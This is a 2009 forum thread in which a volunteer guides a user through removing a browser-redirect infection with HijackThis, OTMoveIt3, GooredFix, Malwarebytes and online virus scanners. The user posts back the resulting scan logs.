O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\program files\common files\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe
--
End of file - 11784 bytes
Hi drrchrds
Thanks for returning your information, let's proceed like this and in the numbered order.
It looks like you are operating your computer with multiple Anti Virus programs running in memory at once:
Avira AntiVir PersonalEdition
McAfee VirusScan
Anti-virus programs take up an enormous amount of your computer's resources when they are actively scanning your computer. Having two anti-virus programs running at the same time can cause your computer to run very slow, become unstable and even, in rare cases, crash.
Please remove one of them.
1 - Download anf Run OTMoveIt3
Download OTMoveIt3 (http://oldtimer.geekstogo.com/OTMoveIt3.exe) by Old Timer and save it to your Desktop.
Double-click OTMoveIt3.exe.
Copy the lines in the codebox below.
:files
c:\windows\kgunefqc
Return to OTMoveIt3, right click in the Paste Instructions for Items to be Moved window (under the yellow bar) and choose Paste.
Click the red Moveit! button.
Copy everything in the Results window (under the green bar), and paste it in your next reply.
Close OTMoveIt3
2 - Download and Run GooredFix
Please download GooredFix (http://jpshortstuff.247fixes.com/GooredFix.exe) and save it to your Desktop.
Double-click Goored.exe to run it.
Select 1. Find Goored (no fix) by typing 1 and pressing Enter.
A log will open, please post the contents of that log in your next reply
(it can also be found on your desktop, called Goored.txt).
Note: Do not run Option #2 yet.
3 - Status Check
Please reply with
1. the OTMoveIt3 log
2. the report from Goored
Thanks peku006
drrchrds
2009-02-11, 17:48
OK, FYI: after ComboFix, I no longer had redirects, but when I got up this morning the comp had restared overnight and they were back.
Here are the results of OT and Goored:
========== FILES ==========
c:\windows\kgunefqc moved successfully.
OTMoveIt3 by OldTimer - Version 1.0.8.0 log created on 02112009_113654
GooredFix v1.9 by jpshortstuff
Log created at 11:39 on 11/02/2009 running Option #1 (David)
Firefox version 3.0.6 (en-US)
=====Suspect Goored Entries=====
=====Dumping Registry Values=====
[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.6\extensions]
"Plugins"="C:\Program Files\Mozilla Firefox\plugins"
[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.6\extensions]
"Components"="C:\Program Files\Mozilla Firefox\components"
[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
"{B7082FAA-CB62-4872-9106-E42DD88EDE45}"="C:\Program Files\McAfee\SiteAdvisor"
Lastly, let me know if it is not OK for me to be running these things remotely via LogMeIn. I am at work, the comp is at home, so I am logging in to do this stuff.
Thanks
Hi drrchrds
Yes you can use LogMeIn
1 - Run Malwarebytes' Anti-Malware
Open Malwarebytes' Anti-Malware
Select the Update tab
Click Check for Updates
After the update have been completed, Select the Scanner tab.
Make sure the "Perform full scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button
The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
Click on the Show Results button to see a list of any malware that was found.
Make sure that everything is checked, and click Remove Selected.
When removal is completed, a log report will open in Notepad and you may be prompted to restart your computer. (see Note below)
The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
The log can also be found here:
C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
Copy and paste the contents of that report in your next reply and exit MBAM.
Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts. Click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.
2 - Run Hijackthis
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad
3 - Status Check
Please reply with
1. the Malwarebytes' Anti-Malware Log
2. a fresh HijackThis log
Thanks peku006
drrchrds
2009-02-12, 02:02
Malwarebytes' Anti-Malware 1.34
Database version: 1750
Windows 5.1.2600 Service Pack 3
2/11/2009 8:00:27 PM
mbam-log-2009-02-11 (20-00-27).txt
Scan type: Full Scan (C:\|E:\|H:\|)
Objects scanned: 363723
Time elapsed: 2 hour(s), 29 minute(s), 6 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
(No malicious items detected)
Registry Data Items Infected:
(No malicious items detected)
Folders Infected:
(No malicious items detected)
Files Infected:
(No malicious items detected)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:02:07 PM, on 2/11/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\system32\EloSrvce.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\Program Files\LogMeIn\x86\LogMeIn.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\Microsoft LifeCam\MSCamS32.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\pctspk.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\UAService7.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\system32\EloDkMon.exe
C:\WINDOWS\system32\EloTTray.exe
C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
C:\Program Files\Olympus\DeviceDetector\DevDtct2.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.BIN
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\winlogon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: (no name) - {815DA7A2-230F-4F5E-B783-1F13341DEA79} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: (no name) - {A397DAB5-063F-4105-83DB-1BFE56D3816D} - (no file)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.0.926.3450\swg.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O2 - BHO: (no name) - {D38232E4-644C-4B95-B446-130B686E6EB8} - (no file)
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [Elo Touch Systems] C:\Program Files\EloTouchSystems\EloTTray.exe (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [Google Update] "C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [AdobeUpdater] "C:\Program Files\Common Files\Adobe\Updater5\AdobeUpdater.exe" (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background (User 'Mrs. Richards')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - S-1-5-21-1275210071-796845957-839522115-1010 Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (User 'Mrs. Richards')
O4 - S-1-5-21-1275210071-796845957-839522115-1010 User Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (User 'Mrs. Richards')
O4 - Startup: ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O4 - Startup: OpenOffice.org 2.4.lnk = C:\Program Files\OpenOffice.org 2.4\program\quickstart.exe
O4 - Global Startup: Acrobat Assistant.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
O4 - Global Startup: Device Detector 2.lnk.disabled
O4 - Global Startup: Device Detector 3.lnk = C:\Program Files\Olympus\DeviceDetector\DevDtct2.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
O4 - Global Startup: Microsoft Office.lnk.disabled
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/yautocomplete.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.mcafee.com/molbin/shared/mcgdmgr/1,0,0,26/mcgdmgr.cab
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: McAfee Application Installer Cleanup (0171901233147914) (0171901233147914mcinstcleanup) - Unknown owner - C:\WINDOWS\TEMP\017190~1.EXE (file missing)
O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
O23 - Service: Google Desktop Manager 5.8.811.4345 (GoogleDesktopManager-110408-113106) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
O23 - Service: Google Update Service (gupdate1c98bee6cb9fb98) (gupdate1c98bee6cb9fb98) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
O23 - Service: MBackMonitor - McAfee - C:\Program Files\McAfee\MBK\MBackMonitor.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\program files\common files\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe
--
End of file - 13769 bytes
Hi drrchrds
1 - Remove bad HijackThis entries
Run HijackThis
Click on the Scan button
Put a check beside all of the items listed below (if present):
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: (no name) - {815DA7A2-230F-4F5E-B783-1F13341DEA79} - (no file)
O2 - BHO: (no name) - {A397DAB5-063F-4105-83DB-1BFE56D3816D} - (no file)
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O2 - BHO: (no name) - {D38232E4-644C-4B95-B446-130B686E6EB8} - (no file)
Close all open windows and browsers/email, etc...
Click on the "Fix Checked" button
When completed, close the application.
2 - Update Java
Please download JavaRa (http://prm753.bchea.org/click/click.php?id=9) and unzip it to your desktop.
Double-click on JavaRa.exe to start the program.
Click on Remove Older Versions to remove the older versions of Java installed on your computer.
Click Yes when prompted. When JavaRa is done, a notice will appear that a log file has been produced. Click OK.
A log file will pop up. Please save it to a convenient location.
Download the latest version of Java Runtime Environment (JRE) 6 Update 12 (http://java.sun.com/javase/downloads/index.jsp).
Scroll down to where it says "The J2SE Runtime Environment (JRE) allows end-users to run Java applications".
Click the "Download" button to the right.
Select your Platform and check the box that says: "I agree to the Java SE Runtime Environment 6 License Agreement.".
Click on Continue.
Click on the link to download Windows Offline Installation and save it to your desktop. Do NOT use the Sun Download Manager..
Close any programs you may have running - especially your web browser.
Then from your desktop double-click on the download to install the newest version.
3 - Clean temp files
Download and Run ATF Cleaner
Download ATF (Atribune Temp File) Cleaner© by Atribune (http://www.atribune.org/ccount/click.php?id=1) to your desktop.Double-click ATF Cleaner.exe to open it.
Under Main choose:
Windows Temp
Current User Temp
All Users Temp
Temporary Internet Files
Prefetch
Java Cache
*The other boxes are optional*
Then click the Empty Selected button.
if you use Firefox:
Click Firefox at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click NO at the prompt.
if you use Opera:
Click Opera at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click NO at the prompt.
Click Exit on the Main menu to close the program
4 - Kaspersky Online Scan
Please go to Kaspersky website (http://www.kaspersky.com/kos/eng/partner/default/kavwebscan.html) and perform an online antivirus scan.
Read through the requirements and privacy statement and click on Accept button.
It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
When the downloads have finished, click on Settings.
Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button: Spyware, Adware, Dialers, and other potentially dangerous programs
Archives
Mail databases Click on My Computer under Scan.
Once the scan is complete, it will display the results. Click on View Scan Report.
You will see a list of infected items there. Click on Save Report As....
Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
Please post this log in your next reply.
5 - Run Hijackthis
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad
6 - Status Check
Please reply with
1. the Kaspersky online scanner report
2. a fresh HijackThis log
How's the computer running now? Any problems?
Thanks peku006
drrchrds
2009-02-12, 14:52
I removed old versions of Java and then I followed the link to: http://java.sun.com/javase/downloads/index.jsp#jre
I did not find the text "The J2SE Runtime Environment (JRE) allows end-users to run Java applications" on that page. Is it the first download on the top of the page that I want? The JRE 6 Update 12?
Hi
Yes it´s JRE 6 Update 12
drrchrds
2009-02-12, 20:36
I am having trouble with Kaspersky, I can't seem to get it to run in Firefox and in IE it runs really slow. After almost 30 mins it had 1%, at that rate it will take 50 hours. It also found one infection, when I clicked to find out what it was the pop up was blocked, I allowed popups and the scan started over. ARGH. Any Idea why it wont run in firefox? The "accept" button never becomes clickable.
Hi drrchrds
Perhaps F-Secure is faster :)
F-Secure Online Scan
Please go to F-Secure website (http://support.f-secure.com/ols3beta/start.html) to perform an online scan. Click on Start scanning at the bottom of the page.
You may be prompted to install an ActiveX before you are able to accept the License Agreement. If prompted, please install it. After installing, the Accept button will be available.
Click on Accept to accept the License Agreement.
Click on Custom Scan. Under Virus Scan Options, select the Scan whole system option.
Under Other Scan Options, select these options: Scan all files
Scan whole system for rootkits
Scan whole system for spyware
Scan inside archives
Use advanced heuristics Click Start.
It will start installing the scanner and virus definitions. Once the installation is done, it will start scanning automatically. This takes a while. Please be patient.
Click on I want decide item by item.
Under Actions, select None for all infections found.
Click Next.
Click on Show Report.
Please copy and paste this report in your next reply.
Click Finish.
Thanks peku006
drrchrds
2009-02-13, 05:59
Scanning Report
Thursday, February 12, 2009 15:26:31 - 15:59:15
Computer name: CRUNCHER1
Scanning type: Scan system for viruses, rootkits, spyware
Target: C:\ E:\ H:\
Result: 1 malware found
TrackingCookie.Revsci (spyware)
* System
Statistics
Scanned:
* Files: 0
* System: 5574
* Not scanned: 0
Actions:
* Disinfected: 0
* Renamed: 0
* Deleted: 0
* None: 1
* Submitted: 0
Files not scanned:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:58:37 PM, on 2/12/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\system32\EloSrvce.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\Program Files\LogMeIn\x86\LogMeIn.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\Microsoft LifeCam\MSCamS32.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\pctspk.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\UAService7.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\system32\EloDkMon.exe
C:\WINDOWS\system32\EloTTray.exe
C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
C:\Program Files\Olympus\DeviceDetector\DevDtct2.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.BIN
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\winlogon.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\mcafee\msc\mcupdui.exe
C:\WINDOWS\system32\wscntfy.exe
